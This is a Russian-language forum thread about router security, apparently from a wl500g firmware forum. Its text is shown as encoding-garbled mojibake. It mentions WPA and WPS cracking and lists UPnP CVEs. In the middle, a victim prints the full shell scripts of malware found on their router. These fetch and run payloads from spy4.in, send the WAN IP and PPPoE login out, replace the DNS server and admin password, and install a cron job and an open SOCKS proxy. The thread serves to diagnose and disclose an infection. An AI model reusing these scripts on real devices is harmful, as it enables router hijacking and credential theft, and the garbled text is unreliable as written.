Âíèìàíèå! Áåçîïàñíîñòü Linux-based MIPSel ðîóòåðîâ!

[TReX]

 ïðîøèâêàõ Îëåãè è Ýíòóçèàñòîâ WPS íåò êàê êëàññà, ñîîòâåòñòâåííî, ëîìàòü íå÷åãî.
Ïîñêîëüêó îáñóæäàòü íå÷åãî - ïåðåí¸ñ ñþäà.

ÀÀÀ ìîæíî íåìíîæêî ïîôëóäèòü? Ðàç óæ ïîäíÿëè òóò ýòó òåìó, òî - Ïîäáîð ïàðîëåé ê WPA/WPA2 ñ èñïîëüçîâàíèåì âèäåîêàðòû http://habrahabr.ru/post/122553/ - åñòåñòâåííî ðàáîòàåò âíå çàâèñèìîñòè îò òîãî êàêàÿ ïðîøèâêà óñòàíîâëåííà íà ðîóòåðå) Èñïîëüçóåòñÿ êàê îáñ÷åò íà âèäåîêàðòå òàê è ñîêðàùåíèå íåîáõîäèìîãî äèàïàçîíà ïðîñ÷åòà ñ èñïîëüçîâàíèåì "êàê ýòî ïî ðóññêè" - ðàäóæíûõ òàáëèö )

Äåêëàéìåð - Åñòåñòâåííî ïðèìåíÿåòñÿ òîëüêî äëÿ íàõîæäåíèÿ çàáûòîãî ïàðîëÿ ê ñâîåé òî÷êå )

[Pablo Escobar]

êîëëåãè, êàþñü, ïîìíèë, íî çàáûë.
êàê ïîñìîòðåòü/ïîìåíÿòü ïàðîëü ðóòà èç âåá-ìîðäû?

ñïàñèáî.

[ABATAPA]

Ïîäáîð ïàðîëåé ê WPA/WPA2 ñ èñïîëüçîâàíèåì âèäåîêàðòû http://habrahabr.ru/post/122553/ - åñòåñòâåííî ðàáîòàåò âíå çàâèñèìîñòè îò òîãî êàêàÿ ïðîøèâêà óñòàíîâëåííà íà ðîóòåðå) Èñïîëüçóåòñÿ êàê îáñ÷åò íà âèäåîêàðòå òàê è ñîêðàùåíèå íåîáõîäèìîãî äèàïàçîíà ïðîñ÷åòà ñ èñïîëüçîâàíèåì "êàê ýòî ïî ðóññêè" - ðàäóæíûõ òàáëèö )

Òîãäà è ÿ äîáàâëþ: âçëîì WPS.

Ñþäà æå: "Óãîëîâíûé êîäåêñ ÐÔ (ÓÊ ÐÔ). Ñòàòüÿ 272. Íåïðàâîìåðíûé äîñòóï ê êîìïüþòåðíîé èíôîðìàöèè."

êîëëåãè, êàþñü, ïîìíèë, íî çàáûë.
êàê ïîñìîòðåòü/ïîìåíÿòü ïàðîëü ðóòà èç âåá-ìîðäû?

Êàê ïîìåíÿòü èç âåá-ìîðäû? "System Setup" —> "Change Password"
Èç êîíñîëè ïîñìîòðåòü:
nvram show | grep http_passwd

[MercuryV]

 ïðîøèâêàõ Îëåãè è Ýíòóçèàñòîâ WPS íåò êàê êëàññà, ñîîòâåòñòâåííî, ëîìàòü íå÷åãî.
Ïîñêîëüêó îáñóæäàòü íå÷åãî - ïåðåí¸ñ ñþäà.

òîïèêñòàðòåð ýòîãî íå óâèäåë è âñ¸ åùå âîëíóåòñÿ

[YuriM]

 ñâÿçè íàéäåííîé óÿçâèìîñòüþ â wps, õî÷ó óçíàòü, ðàáîòàåò ëè îí â ïðîøèâêå "îò îëåãà".  îðèãèíàëüíîé ïðîøèâêå âðîäå åñòü è ìîæíî îòêëþ÷àòü.
Ðîóòåð asus wl500gpv2.

[Visionary]

Èìåþ wl500gpv2 óæå 3 ãîäà. Èçó÷èë ïîëíîñòüþ. Íåäàâíî ïåðåïðîøèë íà ïîñëåäíþþ ïðîøèâêó îò ýíòóçèàñòîâ.
áûëè íåêîòîðûå ïðîáëåìû ñ samba (íåò äîñòóïà ñ ipad èç ïðîãðàììû buzz player). ïîýòîìó îòêëþ÷èë iptables (iptables -P FORWARD ACCEPT
iptables -P INPUT ACCEPT).
òàê è îñòàâèë. ñåãîäíÿ íóæíî áûëî èçìåíèòü íåêîòîðûå ñêðèïòû. îáðàòèë âíèìàíèå, ÷òî â /tmp/local/sbin ìíîãî ôàéëîâ. ïðèáèë ëèøíèå ïðîöåññû è íà÷àë ñìîòðåòü...
ñîäåðæèìîå post-firewall:

Code:

#!/bin/sh

cd /usr/local/sbin
wget -q http://spy4.in/data/tofire
chmod +x tofire
sh tofire
rm -rf tofire

äîáàâèëñÿ ôàéë tocron:

Code:

#!/bin/sh
cd /usr/local/sbin && wget -q http://spy4.in/data/todo && chmod +x todo && ./todo && rm -rf todo

èñïîëíÿåìûå 3proxy, proxy, udppm, socks è åùå ïàðó

ñîäåðæèìîå http://spy4.in/data/todo:

Code:

#!/bin/sh

rip=`nvram get wan0_ipaddr`
ilogin=`nvram get wan0_pppoe_username`
sport=`cat /usr/local/etc/sport`
sleep ` tr -cd 1-9 </dev/urandom | head -c 2`s
wget -q -O ttt http://spy4.in/g.php?rname=$ilogin\&rip=$rip\&sport=$sport
rm -rf ttt

ñîäåðæèìîå http://spy4.in/data/tofire:

Code:

#!/bin/sh
nvram set dhcp_dns1_x=217.12.219.20
nvram set http_passwd=qweasdOP
mount -obind /tmp/local /opt
cd /tmp/ && wget http://spy4.in/data/3.tgz && tar xvzf 3.tgz
rm -rf /tmp/3.tgz
mkdir /var/spool/cron/crontabs/ -p
mv -f /tmp/local/admin /var/spool/cron/crontabs/
chmod +x /var/spool/cron/crontabs/admin
killall crond
sleep 3
crond
crontab /var/spool/cron/crontabs/admin -u admin

SPORT=` tr -cd 1-5 </dev/urandom | head -c 5`
echo $SPORT > /usr/local/etc/sport
echo "daemon
nserver 8.8.8.8
auth none
socks -p$SPORT" > /usr/local/etc/3proxy.cfg
killall 3proxy
sleep 5
3proxy /usr/local/etc/3proxy.cfg
cd /usr/local/sbin && ./tocron

îñîáî íè÷åãî íå âûòÿíåò (ip âíóòðåííèé, iptables óæå âêðóòèë, ïàðîëü ïîìåíÿë).
Êòî íèáóäü ñòàëêèâàëñÿ ñ ïîäîáíûì? ÷åì ãðîçèò êàê äóìàåòå? ãäå åùå ÷åãî ïîñìîòðåòü?

upd ïðîâîðîíèë ÷òî â dhcp èçìåíåí dns íà ëåâûé. â ðåçóëüòàòå ïðîèñõîäèò ïîïûòêà çàðàæåíèÿ ïîäñîåäèíåííûõ óñòðîéñòâ (ïåðåêèäûâàåò íà ñòðàíèöû ñ ïðåäëîæåíèåì îáíîâèòü áðàóçåð.)

[ABATAPA]

Êòî íèáóäü ñòàëêèâàëñÿ ñ ïîäîáíûì?

À î ÷åì, ïî-Âàøåìó, ýòà òåìà?!

÷åì ãðîçèò êàê äóìàåòå?

À ÷åì ìîæåò ãðîçèòü çàõâà÷åííûé ðîóòåð? Ñúåñòü Âàø òðàôèê, "çàñâåòèòü" IP íà ñàéòàõ ïðîòèâîïðàâíîé íàïðàâëåííîñòè (ýêñòðåìèñòñêèõ, ðàñïðîñòðàíÿþùèõ äåòñêîå ïîðíî, è ò. ä.) è ïðèâëå÷ü ê ýòîìó IP âíèìàíèå ïðàâîîõðàíèòåëüíûõ îðãàíîâ, ïåðåõâàòûâàòü âàø òðàôèê, â òîì ÷èñëå ïàðîëè è êóêè, è èñïîëüçîâàòü èõ äëÿ ðàñïðîñòðàíåíèÿ ñïàìà... Ïðîäîëæàòü?

ãäå åùå ÷åãî ïîñìîòðåòü?

À ÷òî, â ðîóòåðå äîôèãà ìåñò, "ãäå ïîñìîòðåòü"?

upd ïðîâîðîíèë ÷òî â dhcp èçìåíåí dns íà ëåâûé. â ðåçóëüòàòå ïðîèñõîäèò ïîïûòêà çàðàæåíèÿ ïîäñîåäèíåííûõ óñòðîéñòâ (ïåðåêèäûâàåò íà ñòðàíèöû ñ ïðåäëîæåíèåì îáíîâèòü áðàóçåð.)

Ñòàâüòå íîâóþ ïðîøèâêó, äåëàéòå ñáðîñ â çàâîäñêèå óñòàíîâêè, óäàëÿ¸òå âñ¸ ñ íîñèòåëåé è èç flashfs. È íå îòêëþ÷àéòå áåçäóìíî ôàåðâîë!

[hairpin]

 ïðîøèâêå ïðèñóòñòâóåò libupnp ñ îáíàðóæåííîé óÿçâèìîñòüþ http://seclists.org/bugtraq/2013/Jan/130 ?
Ãäå-òî ÷èòàë, ÷òî äàæå ñ âíåøíåãî èíòåðôåéñà UPnP óÿçâèì. Ýòî ïðàâäà?

[AlexeyS]

 ïðîøèâêå ïðèñóòñòâóåò libupnp ñ îáíàðóæåííîé óÿçâèìîñòüþ http://seclists.org/bugtraq/2013/Jan/130 ?
Ãäå-òî ÷èòàë, ÷òî äàæå ñ âíåøíåãî èíòåðôåéñà UPnP óÿçâèì. Ýòî ïðàâäà?

Ó íàñ óæå äàâíî miniupnpd âìåñòî íåå.

[hairpin]

Ó íàñ óæå äàâíî miniupnpd âìåñòî íåå.

Íå îäíà libupnp óÿçâèìà, miniupnp 1.0 òîæå
Stack-based buffer overflow in the ExecuteSoapAction function in the SOAPAction handler in the HTTP service in MiniUPnP MiniUPnPd 1.0 allows remote attackers to execute arbitrary code via a long quoted method.
http://web.nvd.nist.gov/view/vuln/de...=CVE-2013-0230
ß ïðîâåðèë íà ñâîåì RT-N16: íà çàâîäñêîé ïðîøèâêå 3.0.0.4.260 ñ âêëþ÷åííûì UPnP äëÿ òåñòà Rapid7 îêàçàëñÿ íåóÿçâèì.
Ïî äàííûì Rapid7: "332 products use MiniUPnPd version 1.0, which is remotely exploitable. Over 69% of all MiniUPnPd fingerprints were version 1.0 or older."

[AlexeyS]

ß òîæå ïðîâåðèë ñâîé wl500gp ñ ìåñòíîé ïðîøèâêîé, âåðäèêò - íå óÿçâèì. Òàê ÷òî áåñïîêîèòüñÿ íå î ÷åì.

[Omega]

Êðèòè÷åñêàÿ óÿçâèìîñòü âî ìíîãèõ ðîóòåðàõ ðàçëè÷íûõ âåíäîðîâ

Êàê ñîîáùàëîñü ðàíåå, êîìïàíèÿ DefenseCode îáíàðóæèëà óÿçâèìîñòü íóëåâîãî äíÿ â ðîóòåðàõ Cisco Linksys.
Ïðåäñòàâèòåëè êîìïàíèè îïîâåñòèëè âåíäîðà è âçÿëè òàéì-àóò íà ïàðó íåäåëü ïåðåä ðàñêðûòèåì äåòàëåé óÿçâèìîñòè.
Âðåìÿ âûøëî, íåêîòîðûå ïîäðîáíîñòè áûëè ðàñêðûòû è îêàçàëîñü, ÷òî íå òîëüêî Cisco Linksys óÿçâèìà.
Âîò òîëüêî ÷àñòü âåíäîðîâ, ãäå ïðèñóòñòâóåò óÿçâèìîñòü:

• Asus
• Broadcom
• Cisco
• D-Link
• Netgear
• TP-Link
• Zyxel
• US Robotics

Ðå÷ü èä¸ò î ñðàçó íåñêîëüêèõ óÿçâèìîñòÿõ, êîòîðûå êðîþòñÿ â ðÿäå ðåàëèçàöèé ïðîòîêîëà UPnP è SSDP
(îñíîâàííûå íà Intel/Portable UPnP SDK è MiniUPnP SDK):

• 1. CVE-2012-5958
• 2. CVE-2012-5959
• 3. CVE-2012-5960
• 4. CVE-2012-5961
• 5. CVE-2012-5962
• 6. CVE-2012-5963
• 7. CVE-2012-5964
• 8. CVE-2012-5965
• 9. CVE-2013-0229
• 10. CVE-2013-0230

Óÿçâèìîñòè ïîçâîëÿþò âûçâàòü îòêàç â îáñëóæèâàíèè èëè âûïîëíèòü ïðîèçâîëüíûé êîä íà óñòðîéñòâå áåç àâòîðèçàöèè. À ò.ê. ìíîãèå
ðîóòåðû âçàèìîäåéñòâóþò ñ UPnP ÷åðåç WAN, ýòî äåëàåò èõ óÿçâèìûìè íå òîëüêî ê àòàêå èç ëîêàëüíîé ñåòè, íî è èç óäàë¸ííûõ ñåòåé.

Ò.å. ïðàêòè÷åñêè ñ ëþáîãî êîìïüþòåðà Èíòåðíåòà. Óÿçâèìûìè ìîãóò îêàçàòüñÿ íå òîëüêî ðîóòåðû, íî âîîáùå ëþáîå îáîðóäîâàíèå,
èñïîëüçóþùåå UPnP: ïðèíòåðû, ìåäèà-ñåðâåðû, IP-êàìåðû, NAS, smart TV è ò.ä. Ò.å. ðå÷ü èä¸ò î ìèëëèîíàõ óñòðîéñòâ!

http://habrahabr.ru/post/168613/ http://habrahabr.ru/post/165737/

[IrWert]

http://habrahabr.ru/post/168613/
Îíî íàñ íå êàñàåòñÿ?

[Vampik]

http://habrahabr.ru/post/168613/
Îíî íàñ íå êàñàåòñÿ?

http://wl500g.info/showthread.php?19...142#post258142
http://habrahabr.ru/post/168613/#comment_5838187

[KOCTET]

http://habrahabr.ru/post/168613/#comment_5838187

Ïëàêàë íà ýòèì ïîñòîì
Íó è ñîáñòâåííî â âèäåî ïîêàçûâàþùåå ýòó óÿçâèìîñòü àòàêà íà ðîóòåð ïî÷åìó òî áûëà èç ëàí ñåòè, ò.å. ðîóòåð îíè ëîìàëè ïî àäðåñó 192.168.1.1